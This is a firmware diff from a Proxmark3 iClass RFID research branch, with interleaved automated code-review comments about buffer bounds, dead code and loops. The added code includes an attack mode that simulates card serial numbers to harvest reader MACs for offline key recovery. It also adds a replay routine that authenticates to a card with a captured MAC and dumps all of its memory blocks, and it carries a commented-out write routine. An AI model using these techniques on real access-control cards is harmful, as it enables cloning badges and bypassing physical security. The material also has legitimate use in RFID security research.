Merge remote-tracking branch 'origin/master' into PenturaLabs-iclass-research
index 7289abbc2a465250a222cb3f07a6e111a4f1fe9a..0ff24bfdd08f8eb0eb45f90e045b4b9db87a22fb 100644 (file)
 #include "util.h"
 #include "string.h"
 #include "common.h"
+#include "cmd.h"
 // Needed for CRC in emulation mode;
 // same construction as in ISO 14443;
 // different initial value (CRC_ICLASS)
 #include "iso14443crc.h"
+#include "iso15693tools.h"
 
 static int timeout = 4096;
 
@@ -669,6 +671,8 @@ void RAMFUNC SnoopIClass(void)
     // The response (tag -> reader) that we're receiving.
        uint8_t *tagToReaderResponse = (((uint8_t *)BigBuf) + RECV_RES_OFFSET);
 
+    FpgaDownloadAndGo(FPGA_BITSTREAM_HF);
     // reset traceLen to 0
     iso14a_set_tracing(TRUE);
     iso14a_clear_trace();
@@ -954,7 +958,7 @@ static void CodeIClassTagSOF()
        // Convert from last byte pos to length
        ToSendMax++;
 }
-
+int doIClassSimulation(uint8_t csn[], int breakAfterMacReceived, uint8_t *reader_mac_buf);
 /**
  * @brief SimulateIClass simulates an iClass card.
  * @param arg0 type of simulation
@@ -971,43 +975,49 @@ void SimulateIClass(uint32_t arg0, uint32_t arg1, uint32_t arg2, uint8_t *datain
 {
        uint32_t simType = arg0;
        uint32_t numberOfCSNS = arg1;
+       FpgaDownloadAndGo(FPGA_BITSTREAM_HF);
 
        // Enable and clear the trace
        iso14a_set_tracing(TRUE);
        iso14a_clear_trace();
 
        uint8_t csn_crc[] = { 0x03, 0x1f, 0xec, 0x8a, 0xf7, 0xff, 0x12, 0xe0, 0x00, 0x00 };
-
        if(simType == 0) {
                // Use the CSN from commandline
                memcpy(csn_crc, datain, 8);
-               doIClassSimulation(csn_crc,0);
+               doIClassSimulation(csn_crc,0,NULL);
        }else if(simType == 1)
        {
-               doIClassSimulation(csn_crc,0);
+               doIClassSimulation(csn_crc,0,NULL);
        }
        else if(simType == 2)
        {
+
+               uint8_t mac_responses[64] = { 0 };
                Dbprintf("Going into attack mode");
                // In this mode, a number of csns are within datain. We'll simulate each one, one at a time
                // in order to collect MAC's from the reader. This can later be used in an offlne-attack
                // in order to obtain the keys, as in the "dismantling iclass"-paper.
-               for(int i = 0 ; i < numberOfCSNS && i*8+8 < USB_CMD_DATA_SIZE; i++)
+               int i = 0;
+               for( ; i < numberOfCSNS && i*8+8 < USB_CMD_DATA_SIZE; i++)
                {
                        // The usb data is 512 bytes, fitting 65 8-byte CSNs in there.
 
                        memcpy(csn_crc, datain+(i*8), 8);
-                       if(doIClassSimulation(csn_crc,1))
+                       if(doIClassSimulation(csn_crc,1,mac_responses))
                        {
                                return; // Button pressed
                        }
                }
+               cmd_send(CMD_ACK,CMD_SIMULATE_TAG_ICLASS,i,0,mac_responses,i*8);
+
        }
        else{
                // We may want a mode here where we hardcode the csns to use (from proxclone).
                // That will speed things up a little, but not required just yet.
                Dbprintf("The mode is not implemented, reserved for future use");
        }
+       Dbprintf("Done...");
 
 }
 /**
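Review bot: `mac_responses` is 64 bytes, but the loop can run up to 63 iterations and `cmd_send(CMD_ACK,CMD_SIMULATE_TAG_ICLASS,i,0,mac_responses,i*8)` then reports `i*8` bytes from it, so any sweep beyond 8 CSNs sends stack memory past the array; in addition every call receives the same base pointer, so each captured MAC overwrites the previous one at offset 0. Pass a per-CSN slot and bound the loop by the buffer: `for( ; i < numberOfCSNS && i*8+8 < USB_CMD_DATA_SIZE && (size_t)(i*8+8) <= sizeof(mac_responses); i++)` and `if(doIClassSimulation(csn_crc,1,mac_responses + i*8))`. With the 64-byte buffer that caps a sweep at 8 CSNs, so size the array to whatever the client expects to receive. The `return; // Button pressed` also skips the `cmd_send`, so MACs collected before the press are never delivered; a `break` would let the ACK carry the partial result.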
@@ -1015,9 +1025,10 @@ void SimulateIClass(uint32_t arg0, uint32_t arg1, uint32_t arg2, uint8_t *datain
  * @param csn - csn to use
  * @param breakAfterMacReceived if true, returns after reader MAC has been received.
  */
-int doIClassSimulation(uint8_t csn[], int breakAfterMacReceived)
+int doIClassSimulation(uint8_t csn[], int breakAfterMacReceived, uint8_t *reader_mac_buf)
 {
 
+
        // CSN followed by two CRC bytes
        uint8_t response2[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
        uint8_t response3[] = { 0,0,0,0,0,0,0,0,0,0};
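Review bot: The new `reader_mac_buf` parameter is undocumented while the doxygen block just above still lists only `csn` and `breakAfterMacReceived`. Add `@param reader_mac_buf - if non-NULL and breakAfterMacReceived is set, the 8 bytes following the reader's 0x05 command are copied here before the function returns`. It is also worth stating that the caller must provide at least 8 bytes, since the copy length is fixed. doIClassSimulation's body continues beyond this hunk.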
@@ -1092,10 +1103,11 @@ int doIClassSimulation(uint8_t csn[], int breakAfterMacReceived)
 
 
        // Start from off (no field generated)
-       FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF);
-       SpinDelay(200);
-
-
+       //FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF);
+       //SpinDelay(200);
+       FpgaWriteConfWord(FPGA_MAJOR_MODE_HF_ISO14443A | FPGA_HF_ISO14443A_TAGSIM_LISTEN);
+       SpinDelay(100);
+       StartCountSspClk();
        // We need to listen to the high-frequency, peak-detected path.
        SetAdcMuxFor(GPIO_MUXSEL_HIPKD);
        FpgaSetupSsc();
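Review bot: The two lines `//FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF);` and `//SpinDelay(200);` are commented-out code rather than a deletion; version control keeps the history, so drop them. The same applies to the `/** Hack for testing ... end hack **/` block, the `//break;` and the `//Dbprintf("%x", cmdsRecvd);` in the later hunks of this function. With `//break;` the `if(cmdsRecvd > 100)` branch is empty, so the 100-command bound no longer terminates the loop and only the button press or `exitLoop` does; if that is intended, remove the dead check rather than leaving the comparison. doIClassSimulation starts and ends outside this hunk.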
@@ -1107,10 +1119,14 @@ int doIClassSimulation(uint8_t csn[], int breakAfterMacReceived)
        uint32_t r2t_time =0;
 
        LED_A_ON();
-       bool displayDebug = true;
        bool buttonPressed = false;
+
+       /** Hack  for testing
+       memcpy(reader_mac_buf,csn,8);
+       exitLoop = true;
+       end hack **/
+
        while(!exitLoop) {
-               displayDebug = true;
 
                LED_B_OFF();
                //Signal tracer
@@ -1131,13 +1147,11 @@ int doIClassSimulation(uint8_t csn[], int breakAfterMacReceived)
                        resp = resp1; respLen = resp1Len; //order = 1;
                        respdata = &sof;
                        respsize = sizeof(sof);
-                       displayDebug = false;
                } else if(receivedCmd[0] == 0x0c) {
                        // Reader asks for anticollission CSN
                        resp = resp2; respLen = resp2Len; //order = 2;
                        respdata = response2;
                        respsize = sizeof(response2);
-                       //displayDebug = false;
                        //DbpString("Reader requests anticollission CSN:");
                } else if(receivedCmd[0] == 0x81) {
                        // Reader selects anticollission CSN.
@@ -1155,18 +1169,21 @@ int doIClassSimulation(uint8_t csn[], int breakAfterMacReceived)
                } else if(receivedCmd[0] == 0x05) {
                        // Reader random and reader MAC!!!
                        // Do not respond
-                       // We do not know what to answer, so lets keep quit
+            // We do not know what to answer, so lets keep quiet
                        resp = resp1; respLen = 0; //order = 5;
                        respdata = NULL;
                        respsize = 0;
                        if (breakAfterMacReceived){
-                               // TODO, actually return this to the caller instead of just
                                // dbprintf:ing ...
-                               Dbprintf("CSN: %02x %02x %02x %02x %02x %02x %02x %02x");
+                               Dbprintf("CSN: %02x %02x %02x %02x %02x %02x %02x %02x",csn[0],csn[1],csn[2],csn[3],csn[4],csn[5],csn[6],csn[7]);
                                Dbprintf("RDR:  (len=%02d): %02x %02x %02x %02x %02x %02x %02x %02x %02x",len,
                                                 receivedCmd[0], receivedCmd[1], receivedCmd[2],
                                                receivedCmd[3], receivedCmd[4], receivedCmd[5],
                                                receivedCmd[6], receivedCmd[7], receivedCmd[8]);
+                               if (reader_mac_buf != NULL)
+                               {
+                                       memcpy(reader_mac_buf,receivedCmd+1,8);
+                               }
                                exitLoop = true;
                        }
                } else if(receivedCmd[0] == 0x00 && len == 1) {
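Review bot: `memcpy(reader_mac_buf,receivedCmd+1,8)` copies eight bytes regardless of `len`, so a short or malformed 0x05 frame hands the caller whatever the buffer held (the 0x44 fill from the per-iteration `memset`) as if it were a reader MAC. Guard the copy on the frame length: `if (reader_mac_buf != NULL && len >= 9)`. The orphaned `// dbprintf:ing ...` line left behind after removing the TODO above it should go too, and the re-indented `// We do not know what to answer` comment now uses spaces where the rest of the block uses tabs. doIClassSimulation starts and ends outside this hunk.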
@@ -1190,7 +1207,7 @@ int doIClassSimulation(uint8_t csn[], int breakAfterMacReceived)
 
                if(cmdsRecvd >  100) {
                        //DbpString("100 commands later...");
-                       break;
+                       //break;
                }
                else {
                        cmdsRecvd++;
@@ -1199,29 +1216,13 @@ int doIClassSimulation(uint8_t csn[], int breakAfterMacReceived)
                if(respLen > 0) {
                        SendIClassAnswer(resp, respLen, 21);
                        t2r_time = GetCountSspClk();
-
-//                     }
-                       if(displayDebug) Dbprintf("R2T:(len=%d): %x %x %x %x %x %x %x %x %x\nT2R: (total/data =%d/%d): %x %x %x %x %x %x %x %x %x",
-                       len,
-                       receivedCmd[0], receivedCmd[1], receivedCmd[2],
-                       receivedCmd[3], receivedCmd[4], receivedCmd[5],
-                       receivedCmd[6], receivedCmd[7], receivedCmd[8],
-                       respLen,respsize,
-                       resp[0], resp[1], resp[2],
-                       resp[3], resp[4], resp[5],
-                       resp[6], resp[7], resp[8]);
-
                }
 
                if (tracing) {
-                       //LogTrace(receivedCmd,len, rsamples, Uart.parityBits, TRUE);
-
                        LogTrace(receivedCmd,len, (r2t_time-time_0)<< 4, Uart.parityBits,TRUE);
                        LogTrace(NULL,0, (r2t_time-time_0) << 4, 0,TRUE);
 
                        if (respdata != NULL) {
-                               //LogTrace(respdata,respsize, rsamples, SwapBits(GetParity(respdata,respsize),respsize), FALSE);
-                               //if(!LogTrace(resp,respLen, rsamples,SwapBits(GetParity(respdata,respsize),respsize),FALSE))
                                LogTrace(respdata,respsize, (t2r_time-time_0) << 4,SwapBits(GetParity(respdata,respsize),respsize),FALSE);
                                LogTrace(NULL,0, (t2r_time-time_0) << 4,0,FALSE);
 
@@ -1236,7 +1237,7 @@ int doIClassSimulation(uint8_t csn[], int breakAfterMacReceived)
                memset(receivedCmd, 0x44, RECV_CMD_SIZE);
        }
 
-       Dbprintf("%x", cmdsRecvd);
+       //Dbprintf("%x", cmdsRecvd);
        LED_A_OFF();
        LED_B_OFF();
        if(buttonPressed)
@@ -1465,16 +1466,255 @@ int ReaderReceiveIClass(uint8_t* receivedAnswer)
   return Demod.len;
 }
 
+void setupIclassReader()
+{
+    FpgaDownloadAndGo(FPGA_BITSTREAM_HF);
+    // Reset trace buffer
+    iso14a_set_tracing(TRUE);
+    iso14a_clear_trace();
+
+    // Setup SSC
+    FpgaSetupSsc();
+    // Start from off (no field generated)
+    // Signal field is off with the appropriate LED
+    LED_D_OFF();
+    FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF);
+    SpinDelay(200);
+
+    SetAdcMuxFor(GPIO_MUXSEL_HIPKD);
+
+    // Now give it time to spin up.
+    // Signal field is on with the appropriate LED
+    FpgaWriteConfWord(FPGA_MAJOR_MODE_HF_ISO14443A | FPGA_HF_ISO14443A_READER_MOD);
+    SpinDelay(200);
+    LED_A_ON();
+
+}
+
 // Reader iClass Anticollission
 void ReaderIClass(uint8_t arg0) {
+    uint8_t act_all[]     = { 0x0a };
+    uint8_t identify[]    = { 0x0c };
+    uint8_t select[]      = { 0x81, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
+    uint8_t readcheck_cc[]= { 0x88, 0x02 };
+
+    uint8_t card_data[24]={0};
+    uint8_t last_csn[8]={0};
+
+    uint8_t* resp = (((uint8_t *)BigBuf) + 3560);      // was 3560 - tied to other size changes
+
+    int read_status= 0;
+    bool abort_after_read = arg0 & FLAG_ICLASS_READER_ONLY_ONCE;
+
+    setupIclassReader();
+
+    size_t datasize = 0;
+    while(!BUTTON_PRESS())
+    {
+        WDT_HIT();
+
+        // Send act_all
+        ReaderTransmitIClass(act_all, 1);
+        // Card present?
+        if(ReaderReceiveIClass(resp)) {
+
+            ReaderTransmitIClass(identify, 1);
+
+            if(ReaderReceiveIClass(resp) == 10) {
+                //Copy the Anti-collision CSN to our select-packet
+                memcpy(&select[1],resp,8);
+                //Dbprintf("Anti-collision CSN: %02x %02x %02x %02x %02x %02x %02x %02x",resp[0], resp[1], resp[2],
+                //        resp[3], resp[4], resp[5],
+                //        resp[6], resp[7]);
+                //Select the card
+                ReaderTransmitIClass(select, sizeof(select));
+
+                if(ReaderReceiveIClass(resp) == 10) {
+                    //Save CSN in response data
+                    memcpy(card_data,resp,8);
+                    datasize += 8;
+                    //Flag that we got to at least stage 1, read CSN
+                    read_status = 1;
+
+                    // Card selected
+                    //Dbprintf("Readcheck on Sector 2");
+                    ReaderTransmitIClass(readcheck_cc, sizeof(readcheck_cc));
+                    if(ReaderReceiveIClass(resp) == 8) {
+                        //Save CC (e-purse) in response data
+                        memcpy(card_data+8,resp,8);
+                        datasize += 8;
+                        //Got both
+                        read_status = 2;
+                    }
+
+                    LED_B_ON();
+                    //Send back to client, but don't bother if we already sent this
+                    if(memcmp(last_csn, card_data, 8) != 0)
+                        cmd_send(CMD_ACK,read_status,0,0,card_data,datasize);
+
+                    //Save that we already sent this....
+                    if(read_status ==  2)
+                        memcpy(last_csn, card_data, 8);
+
+                    LED_B_OFF();
+
+                    if(abort_after_read) break;
+                }
+            }
+        }
+
+        if(traceLen > TRACE_SIZE) {
+            DbpString("Trace full");
+            break;
+        }
+    }
+    LED_A_OFF();
+}
+
+void ReaderIClass_Replay(uint8_t arg0, uint8_t *MAC) {
        uint8_t act_all[]     = { 0x0a };
        uint8_t identify[]    = { 0x0c };
        uint8_t select[]      = { 0x81, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
+       uint8_t readcheck_cc[]= { 0x88, 0x02 };
+       uint8_t check[]       = { 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
+       uint8_t read[]        = { 0x0c, 0x00, 0x00, 0x00 };
+       
+    uint16_t crc = 0;
+       uint8_t cardsize=0;
+       bool read_success=false;
+       uint8_t mem=0;
+       
+       static struct memory_t{
+         int k16;
+         int book;
+         int k2;
+         int lockauth;
+         int keyaccess;
+       } memory;
+       
+       uint8_t* resp = (((uint8_t *)BigBuf) + 3560);   // was 3560 - tied to other size changes
+
+    setupIclassReader();
 
+
+       for(int i=0;i<1;i++) {
+       
+               if(traceLen > TRACE_SIZE) {
+                       DbpString("Trace full");
+                       break;
+               }
+               
+               if (BUTTON_PRESS()) break;
+
+               // Send act_all
+               ReaderTransmitIClass(act_all, 1);
+               // Card present?
+               if(ReaderReceiveIClass(resp)) {
+                       ReaderTransmitIClass(identify, 1);
+                       if(ReaderReceiveIClass(resp) == 10) {
+                               // Select card          
+                               memcpy(&select[1],resp,8);
+                               ReaderTransmitIClass(select, sizeof(select));
+
+                               if(ReaderReceiveIClass(resp) == 10) {
+                                       Dbprintf("     Selected CSN: %02x %02x %02x %02x %02x %02x %02x %02x",
+                                       resp[0], resp[1], resp[2],
+                                       resp[3], resp[4], resp[5],
+                                       resp[6], resp[7]);
+                               }
+                               // Card selected
+                               Dbprintf("Readcheck on Sector 2");
+                               ReaderTransmitIClass(readcheck_cc, sizeof(readcheck_cc));
+                               if(ReaderReceiveIClass(resp) == 8) {
+                                  Dbprintf("     CC: %02x %02x %02x %02x %02x %02x %02x %02x",
+                                       resp[0], resp[1], resp[2],
+                                       resp[3], resp[4], resp[5],
+                                       resp[6], resp[7]);
+                               }else return;
+                               Dbprintf("Authenticate");
+                               //for now replay captured auth (as cc not updated)
+                               memcpy(check+5,MAC,4);
+                //Dbprintf("     AA: %02x %02x %02x %02x",
+                //     check[5], check[6], check[7],check[8]);
+                               ReaderTransmitIClass(check, sizeof(check));
+                               if(ReaderReceiveIClass(resp) == 4) {
+                                  Dbprintf("     AR: %02x %02x %02x %02x",
+                                       resp[0], resp[1], resp[2],resp[3]);
+                               }else {
+                                 Dbprintf("Error: Authentication Fail!");
+                                 return;
+                               }
+                               Dbprintf("Dump Contents");
+                               //first get configuration block
+                               read_success=false;
+                               read[1]=1;
+                               uint8_t *blockno=&read[1];
+                               crc = iclass_crc16((char *)blockno,1);
+                               read[2] = crc >> 8;
+                               read[3] = crc & 0xff;
+                               while(!read_success){
+                                     ReaderTransmitIClass(read, sizeof(read));
+                                     if(ReaderReceiveIClass(resp) == 10) {
+                                        read_success=true;
+                                        mem=resp[5];
+                                        memory.k16= (mem & 0x80);
+                                        memory.book= (mem & 0x20);
+                                        memory.k2= (mem & 0x8);
+                                        memory.lockauth= (mem & 0x2);
+                                        memory.keyaccess= (mem & 0x1);
+
+                                     }
+                               }
+                               if (memory.k16){
+                                 cardsize=255;
+                               }else cardsize=32;
+                               //then loop around remaining blocks
+                               for(uint8_t j=0; j<cardsize; j++){
+                                   read_success=false;
+                                   uint8_t *blockno=&j;
+                                   //crc_data[0]=j;
+                                   read[1]=j;
+                                   crc = iclass_crc16((char *)blockno,1);
+                                   read[2] = crc >> 8;
+                                   read[3] = crc & 0xff;
+                                   while(!read_success){
+                                     ReaderTransmitIClass(read, sizeof(read));
+                                     if(ReaderReceiveIClass(resp) == 10) {
+                                        read_success=true;
+                                        Dbprintf("     %02x: %02x %02x %02x %02x %02x %02x %02x %02x",
+                                         j, resp[0], resp[1], resp[2],
+                                         resp[3], resp[4], resp[5],
+                                         resp[6], resp[7]);
+                                     }
+                                   }
+                               }
+                       }
+               }
+               WDT_HIT();
+       }
+       
+       LED_A_OFF();
+}
+
+//2. Create Read method (cut-down from above) based off responses from 1. 
+//   Since we have the MAC could continue to use replay function.
+//3. Create Write method
+/*
+void IClass_iso14443A_write(uint8_t arg0, uint8_t blockNo, uint8_t *data, uint8_t *MAC) {
+       uint8_t act_all[]     = { 0x0a };
+       uint8_t identify[]    = { 0x0c };
+       uint8_t select[]      = { 0x81, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
+       uint8_t readcheck_cc[]= { 0x88, 0x02 };
+       uint8_t check[]       = { 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
+       uint8_t read[]        = { 0x0c, 0x00, 0x00, 0x00 };
+       uint8_t write[]       = { 0x87, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
+       
+    uint16_t crc = 0;
+       
        uint8_t* resp = (((uint8_t *)BigBuf) + 3560);   // was 3560 - tied to other size changes
 
        // Reset trace buffer
-       memset(trace, 0x44, RECV_CMD_OFFSET);
+    memset(trace, 0x44, RECV_CMD_OFFSET);
        traceLen = 0;
 
        // Setup SSC
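Review bot: In `ReaderIClass`, `datasize` and `read_status` are declared before the `while(!BUTTON_PRESS())` loop and never reset, so on the second card `datasize` reaches 32 and `cmd_send(CMD_ACK,read_status,0,0,card_data,datasize)` sends bytes past the 24-byte `card_data`, while a failed CC read still reports the previous card's `read_status`. Reset both at the top of each iteration: `datasize = 0; read_status = 0;` right after `WDT_HIT();`. In `ReaderIClass_Replay` the `while(!read_success)` loops retransmit until a 10-byte reply arrives with no retry limit, button check or `WDT_HIT()`, so a card removed mid-dump keeps the device spinning (or, presumably, trips the watchdog); a bounded retry count with `if (BUTTON_PRESS()) return;` inside the loop would be safer.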
@@ -1494,7 +1734,7 @@ void ReaderIClass(uint8_t arg0) {
 
        LED_A_ON();
 
-       for(;;) {
+       for(int i=0;i<1;i++) {
        
                if(traceLen > TRACE_SIZE) {
                        DbpString("Trace full");
@@ -1519,13 +1759,67 @@ void ReaderIClass(uint8_t arg0) {
                                        resp[3], resp[4], resp[5],
                                        resp[6], resp[7]);
                                }
-                               // Card selected, whats next... ;-)
-                       }
+                               // Card selected
+                               Dbprintf("Readcheck on Sector 2");
+                               ReaderTransmitIClass(readcheck_cc, sizeof(readcheck_cc));
+                               if(ReaderReceiveIClass(resp) == 8) {
+                                  Dbprintf("     CC: %02x %02x %02x %02x %02x %02x %02x %02x",
+                                       resp[0], resp[1], resp[2],
+                                       resp[3], resp[4], resp[5],
+                                       resp[6], resp[7]);
+                               }else return;
+                               Dbprintf("Authenticate");
+                               //for now replay captured auth (as cc not updated)
+                               memcpy(check+5,MAC,4);
+                               Dbprintf("     AA: %02x %02x %02x %02x",
+                                       check[5], check[6], check[7],check[8]);
+                               ReaderTransmitIClass(check, sizeof(check));
+                               if(ReaderReceiveIClass(resp) == 4) {
+                                  Dbprintf("     AR: %02x %02x %02x %02x",
+                                       resp[0], resp[1], resp[2],resp[3]);
+                               }else {
+                                 Dbprintf("Error: Authentication Fail!");
+                                 return;
+                               }
+                               Dbprintf("Write Block");
+                               
+                               //read configuration for max block number
+                               read_success=false;
+                               read[1]=1;
+                               uint8_t *blockno=&read[1];
+                               crc = iclass_crc16((char *)blockno,1);
+                               read[2] = crc >> 8;
+                               read[3] = crc & 0xff;
+                               while(!read_success){
+                                     ReaderTransmitIClass(read, sizeof(read));
+                                     if(ReaderReceiveIClass(resp) == 10) {
+                                        read_success=true;
+                                        mem=resp[5];
+                                        memory.k16= (mem & 0x80);
+                                        memory.book= (mem & 0x20);
+                                        memory.k2= (mem & 0x8);
+                                        memory.lockauth= (mem & 0x2);
+                                        memory.keyaccess= (mem & 0x1);
+
+                                     }
+                               }
+                               if (memory.k16){
+                                 cardsize=255;
+                               }else cardsize=32;
+                               //check card_size
+                               
+                               memcpy(write+1,blockNo,1);
+                               memcpy(write+2,data,8);
+                               memcpy(write+10,mac,4);
+                               while(!send_success){
+                                 ReaderTransmitIClass(write, sizeof(write));
+                                 if(ReaderReceiveIClass(resp) == 10) {
+                                   write_success=true;
+                               }
+                       }//
                }
                WDT_HIT();
        }
        
        LED_A_OFF();
-}
-
-
+}*/
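Review bot: The block from `/*` before `IClass_iso14443A_write` to `}*/` is roughly a hundred lines of commented-out code that would not compile as written: it uses `read_success`, `mem`, `memory`, `cardsize`, `send_success` and `write_success` without declaring them, refers to `mac` where the parameter is `MAC`, and passes the scalar `blockNo` to `memcpy` as a pointer; the `}//` line also appears to leave the braces unbalanced. Either finish it on a branch or drop it; if it must stay, `#if 0 ... #endif` is clearer than a block comment and keeps the compiler's view of the file honest. The comment containing this code opens in an earlier hunk.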